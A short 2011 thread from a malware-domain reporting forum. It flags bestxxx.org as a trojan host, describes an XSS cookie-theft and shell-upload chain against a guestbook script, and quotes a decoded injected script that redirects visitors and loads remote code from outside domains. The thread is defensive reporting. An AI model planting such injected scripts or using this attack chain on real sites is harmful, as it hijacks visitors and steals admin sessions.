Malware Domain List

Malware Related => Malicious Domains => Topic started by: gimcnuk on February 16, 2011, 02:37:11 pm

Title: Trojan - bestxxx.org
Post by: gimcnuk on February 16, 2011, 02:37:11 pm
Please add the following domain to your base: bestxxx.org

Code:
http://bestxxx.org/images/s.js Trojan
The hacking goes through a hole in the script GB Top-Directory (http://gbscript.com/):
1. XSS injection, stealing cookies from the admin section through this script: bestxxx.org/images/img.php?
2. Uploading shells to the server and inserting JS code from this page: bestxxx.org/images/s.js

Details (in Russian) here: http://mastertalk.ru/topic127171.html - there is also a decoded version of the trojan there.
The Russian hosting support only deletes the scripts, but later they were restored in the same places.

Thanks.

Title: Re: Trojan - bestxxx.org
Post by: SysAdMini on February 16, 2011, 08:21:34 pm
I'm sorry, but I can't reproduce what you reported.

hxxp://bestxxx.org/images/img.php? just returns a gif image.

bestxxx.org/images/s.js decodes to
Code:
<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://xtds.in';</script>
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>

Neither hxxp://xtds.in nor hxxp://www.clayaim.com/index.php?ref=webex leads me to any malware.

Title: Re: Trojan - bestxxx.org
Post by: gimcnuk on February 17, 2011, 01:27:11 pm
This code was inserted into many sites. It was deleted by abuse but later restored in the same place, which means this code was added by the site owner.